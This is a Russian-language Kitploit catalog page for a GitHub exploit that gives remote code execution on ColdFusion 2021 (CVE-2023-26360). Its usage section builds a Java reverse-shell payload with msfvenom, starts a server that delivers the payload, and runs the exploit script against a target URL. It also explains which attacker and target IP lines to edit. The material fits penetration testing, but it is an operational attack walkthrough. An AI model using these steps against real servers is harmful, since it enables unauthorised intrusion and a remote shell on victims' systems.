Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-26360-RCE — Эксплойт для удалённого выполнения кода в ColdFusion 2021 (CVE-2023-26360) | Kitploit
Инструменты/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

Эксплойт для удалённого выполнения кода в ColdFusion 2021 (CVE-2023-26360)

Репозиторий
11310 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-26360 - Удаленное выполнение кода на ColdFusion 2021

Иногда скрипты не срабатывают с первой попытки. Попробуйте несколько раз, чтобы всё заработало.

Как выполнить

Создайте полезную нагрузку с помощью msfvenom

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

Запуск server.py

  • Этот сервер отправит полезную нагрузку на сервер ColdFusion после первоначального доступа с помощью cve.2023-26360.py, поэтому его нужно инициализировать первым.
root@kitploit:~
python3 server.py 8000
  • Аргумент 8000 — это порт, который будет прослушивать сервер.

  • Важно отметить, что строка 12 настраивает IP-адрес сервера, поэтому измените его:

  • root@kitploit:~
    s.bind(('192.168.56.1',port))
    

    Запуск cve-2023-26360.py

    • Чтобы запустить эксплойт, выполните:
    root@kitploit:~
    python3 cve-2023-26360.py 8000
    
    • Как и в server.py, аргумент 8000 — это порт, который будет прослушивать server.py. Поэтому он должен быть одинаковым в обеих командах.

    • Строка 8 в cve-2023-26360.py задаёт IP-адрес, который будет прослушивать server.py. Необходимо настроить его правильно.

    • Строка 11 в cve-2023-26360.py задаёт IP-адрес сервера ColdFusion, поэтому измените его:

    root@kitploit:~
    url = "http://192.168.56.102:8500"
    

    Протестировано на

    • ColdFusion 2021 - Windows Server 2019
    Скачать инструмент